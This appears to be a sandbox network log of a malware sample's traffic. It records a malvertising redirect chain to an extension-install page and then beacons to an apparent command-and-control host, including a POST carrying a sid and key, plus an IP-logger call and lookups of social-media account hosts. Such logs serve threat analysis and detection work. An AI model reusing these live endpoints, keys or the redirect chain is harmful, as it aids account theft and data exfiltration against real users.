                                                                                          referer: https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          server: openresty
                                                                                          date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          content-type: text/html; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          location: https://dist.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          referrer-policy: no-referrer
                                                                                          via: 1.1 google
                                                                                          alt-svc: clear
                                                                                        • DNS
                                                                                          dist.acnav.online
                                                                                          Request
                                                                                          dist.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          dist.acnav.online
                                                                                          IN CNAME
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • GET
                                                                                          https://dist.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Request
                                                                                          GET /?c=ac&subid=16258730992587707149259233454695320&cid=4263119 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: dist.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Location: https://www.acnav.online?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Vary: Accept
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Content-Length: 105
                                                                                          Date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • DNS
                                                                                          www.acnav.online
                                                                                          Request
                                                                                          www.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          www.acnav.online
                                                                                          IN CNAME
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • GET
                                                                                          https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Request
                                                                                          GET /?c=ac&subid=16258730992587707149259233454695320&cid=4263119 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 31283
                                                                                          Etag: "-70761292"
                                                                                          Date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/js/global.min.js
                                                                                          Request
                                                                                          GET /js/global.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "2171-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "2171-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/images/install-step3.png
                                                                                          Request
                                                                                          GET /images/install-step3.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "14921-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "14921-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/config.min.js
                                                                                          Request
                                                                                          GET /config.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "1060-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "1060-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/layouts/box/box.css
                                                                                          Request
                                                                                          GET /layouts/box/box.css HTTP/1.1
                                                                                          Accept: text/css, */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "10747-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "10747-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/images/install-step2.png
                                                                                          Request
                                                                                          GET /images/install-step2.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "20738-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "20738-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/resources/Wiki/links.json
                                                                                          Request
                                                                                          GET /resources/Wiki/links.json HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "389-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "389-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/images/install-step1-chrome.png
                                                                                          Request
                                                                                          GET /images/install-step1-chrome.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "23056-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "23056-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/lang/box/ePedia
                                                                                          Request
                                                                                          GET /lang/box/ePedia HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-None-Match: "1455465032"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Etag: "1455465032"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/resources/Wiki/background.png
                                                                                          Request
                                                                                          GET /resources/Wiki/background.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "65781-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "65781-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/resources/Wiki/logo.png
                                                                                          Request
                                                                                          GET /resources/Wiki/logo.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258730992587707149259233454695320&cid=4263119
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          If-Modified-Since: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          If-None-Match: "9614-1625474775000"
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 304 Not Modified
                                                                                          Server: Cowboy
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "9614-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • GET
                                                                                          https://www.acnav.online/favicon.ico
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: www.acnav.online
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html
                                                                                          Vary: Accept-Encoding
                                                                                          Date: Fri, 09 Jul 2021 23:25:01 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • DNS
                                                                                          www.facebook.com
                                                                                          Request
                                                                                          www.facebook.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.facebook.com
                                                                                          IN CNAME
                                                                                          star-mini.c10r.facebook.com
                                                                                          star-mini.c10r.facebook.com
                                                                                          IN A
                                                                                          157.240.201.35
                                                                                        • GET
                                                                                          https://www.facebook.com/
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Sec-Fetch-Dest: document
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-User: ?1
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          Host: www.facebook.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Vary: Accept-Encoding
                                                                                          x-fb-rlafr: 0
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 0
                                                                                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                          X-Frame-Options: DENY
                                                                                          Strict-Transport-Security: max-age=15552000; preload
                                                                                          Content-Type: text/html; charset="utf-8"
                                                                                          X-FB-Debug: ZULurZY+R4Q5SZfs7oONUzIHuoK8KazZxBuImD222sP8XdDdXsw4C0mr4KlGiZvJPfSMyJ+bUoMDtNnx2elYMg==
                                                                                          Date: Fri, 09 Jul 2021 23:25:10 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                                                                                          Connection: keep-alive
                                                                                        • DNS
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          Request
                                                                                          13.71.61.154.dnsbl.sorbs.net
                                                                                          IN A
                                                                                          Response
                                                                                        • DNS
                                                                                          13.71.61.154.bl.spamcop.net
                                                                                          Request
                                                                                          13.71.61.154.bl.spamcop.net
                                                                                          IN A
                                                                                          Response
                                                                                        • DNS
                                                                                          13.71.61.154.zen.spamhaus.org
                                                                                          Request
                                                                                          13.71.61.154.zen.spamhaus.org
                                                                                          IN A
                                                                                          Response
                                                                                        • DNS
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          Request
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          IN A
                                                                                          Response
                                                                                        • DNS
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          Request
                                                                                          13.71.61.154.sbl-xbl.spamhaus.org
                                                                                          IN A
                                                                                          Response
                                                                                        • DNS
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          Request
                                                                                          13.71.61.154.cbl.abuseat.org
                                                                                          IN A
                                                                                          Response
                                                                                        • GET
                                                                                          http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                          Request
                                                                                          GET /api/fbtime HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:25:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • POST
                                                                                          http://uyg5wye.2ihsfa.com/api/?sid=74023&key=a61861ce653c44bb08dae241634bbf70
                                                                                          Request
                                                                                          POST /api/?sid=74023&key=a61861ce653c44bb08dae241634bbf70 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Content-Length: 266
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:25:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • GET
                                                                                          https://iplogger.org/18hh57
                                                                                          Request
                                                                                          GET /18hh57 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Host: iplogger.org
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:25:12 GMT
                                                                                          Content-Type: image/png
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Set-Cookie: PHPSESSID=ajehete1s3hbhft5hielu7hh05; path=/; HttpOnly
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253175079; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                          Cache-Control: no-cache
                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          Answers:
                                                                                          whoami: d4acea7b6fcc1911bb9f1914a2537b163a3dff6bb0167ceb12feffc6fbc49471
                                                                                          Strict-Transport-Security: max-age=31536000; preload
                                                                                          X-Frame-Options: DENY
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          i.instagram.com
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • DNS
                                                                                          accounts.snapchat.com
                                                                                          Request
                                                                                          accounts.snapchat.com
                                                                                          IN A
                                                                                          Response
                                                                                          accounts.snapchat.com
                                                                                          IN CNAME
                                                                                          ghs.googlehosted.com
                                                                                          ghs.googlehosted.com
                                                                                          IN A
                                                                                          172.217.17.51
                                                                                        • DNS
                                                                                          vexacion.com
                                                                                          Request
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          Response
                                                                                          vexacion.com
                                                                                          IN A
                                                                                          139.45.197.236
                                                                                        • GET
                                                                                          http://vexacion.com/afu.php?id=1294231
                                                                                          Request
                                                                                          GET /afu.php?id=1294231 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: vexacion.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: OAID=3819b934f4054333861a9d6dc9a564e4; oaidts=1625872378; syncedCookie=true
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:28:57 GMT
                                                                                          Content-Type: text/html; charset=utf8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Trace-Id: 7382e8763497abad354241e796cb60d4
                                                                                          Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
